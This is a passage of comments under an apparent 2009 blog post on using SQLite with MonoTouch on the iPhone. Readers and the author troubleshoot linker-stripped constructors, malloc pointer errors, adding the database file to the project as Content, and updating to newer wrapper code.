  at MonoTouch.UIKit.UIApplication.Main (System.String[] args) [0x00000]
  at XactScope.Application.Main (System.String[] args) [0x00000] in /Users/carlmouritsen/Projects/XactScope/Main.cs:14

My Scope class has a default constructor. Any ideas what I'm doing wrong? Thanks.

Is the XactScope.Scope default constructor actually referenced anywhere in the code? The MonoTouch compiler will optimise away methods that don't "appear" to be used. Check my Main.cs for some seemingly useless code: look for the comment beginning //System.MissingMethodException... This is my HACK to ensure the compiler doesn't optimise away my Employee class or any of its getters/setters. Otherwise the compiler can't "see" them being used (since the only other place is via a generic call, db.Query<Employee>, but there are no explicit references to the constructor or properties in code).
There are a number of fixes for this:

1) my 'hack': just reference all the methods/properties manually (even as no-ops) so the compiler keeps them... this is my "first principles" approach in action :)

2) the MonoTouch team added an attribute to stop the compiler doing this - but I haven't tested it yet (and I'm not even sure if they ended up going with [Serializable] or [Preserve]) which you would need to decorate your class with

3) there is a switch you can pass to the compiler, -linksdkonly, in MonoDevelop under Options - iPhone Build - mtouch arguments (courtesy of @simongui). This tells the compiler not to optimize away stuff in *your* code.

HTH

That was it. Thank you.

Do you have an example of inserting into the phonebook using the SQLiteClient.cs?

Craig, I tried your example, and although it works, the Application Output gives an error which looks like...

'CorporateDirectoy1(904,0x...) malloc: *** error for object 0x...: pointer being freed was not allocated'

I adapted some of the code for use in an application I'm developing, and found I didn't have that problem, so I ignored it until upgrading to Snow Leopard and the latest release of the iPhone SDK, at which point my app gives me a shed load of those messages and so does your sample. Which is unfortunate. I was wondering if you could offer any advice?

@Owen Hadn't noticed that - next time I run up that project I'll look into it. Did you notice whether it happens on both the simulator and device (or just one of them)?

@Quan - will look at adding some more SQL operations to the example.

@Craig Unfortunately I don't have an iPhone yet, I'm still awaiting delivery, so I've only been able to test on the simulator.

Do you have an example that uses a SearchBar with the UISearchDisplayController? i.e. wanting to search through the phone book for a specific person.

Pardon my stupidity, I'm getting an error "table not found".
I have added the sqlite file to the project directory; the part I don't get is "included with the application as a 'Content' file within the MonoTouch project" - how do you do that?? I'm new to MonoDevelop...

@grant - not yet, but it is something I've been thinking about adding. Frank has released a cleaned-up, feature-added version of the Sqlite wrapper which you might like to try.

@eddie - Make sure the file is 'in' your project structure (ie. right-click on the project file - Add Files...) then select the file, go to the Properties window and in the Build Action property select "Content".

Is there a reason why my app can't run Update SQL on a device, but it can in the simulator?

Ian - perhaps you could share the exact error you are seeing (both the code you've written and the Output from MonoDevelop). Are you using the _latest_ version of Frank's code? It is difficult to comment further without some concrete information on your implementation.

Much later than the last post, but I also have a question. Everything works - I can return all my (3) records out of a table in my database - but then I receive 9 times a ".... malloc: *** error for object 0xb346800: pointer being freed was not allocated", every time for another object... What to do?

Edit to last post: it happens on line 40 of SQLiteCommand:

cols[i] = MatchColProp (SQLite3.ColumnName (stmt, i), props);

I have no idea how to fix this?

Hi there, this code is very old - looks like it doesn't behave nicely with the latest version of MonoTouch.
I'm going to upload a new version, but to fix it for yourself:

1) get the latest SQLite code from and update the namespace to match

2) remove the .Open() methods - they're no longer required

3) in Main.cs add fields for the delegates:

EmployeeDataSource dataSource;
EmployeeListDelegate @delegate;
UIAlertViewDelegate alertDelegate;

4) in Main.cs FinishedLaunching set the delegates and use the variables instead:

dataSource = new EmployeeDataSource(this);
@delegate = new EmployeeListDelegate(this);
tableviewEmployee.DataSource = dataSource;
tableviewEmployee.Delegate = @delegate;
alertDelegate = new CallAlert (this);

Good luck. I'll update the post when I get the new code uploaded.

Thanks for the answer, but I still have some issues. 1) I use this code instead of the big one you showed me. I'm not using mapping, so your file looked much better for me. 2) So far I'm only testing in the console - no GUI elements - so I guess my fault could not be in that either. It only returns this "pointer being freed was not allocated" when I'm debugging and when I get to this line of code...

The SQLite.cs code you are using is from 2009 - it's almost 3 years old - you should update to the latest code.

I updated the sqlite code I found here on your page and changed some code here and there in comparison with what you gave me in the previous post. Everything works now without that little b*st*rd of a pointer error :D Thanks for your time and responses!
http://conceptdev.blogspot.com/2009/09/monotouch-with-sqlite-corporate.html
CC-MAIN-2017-04
refinedweb
1,445
57.87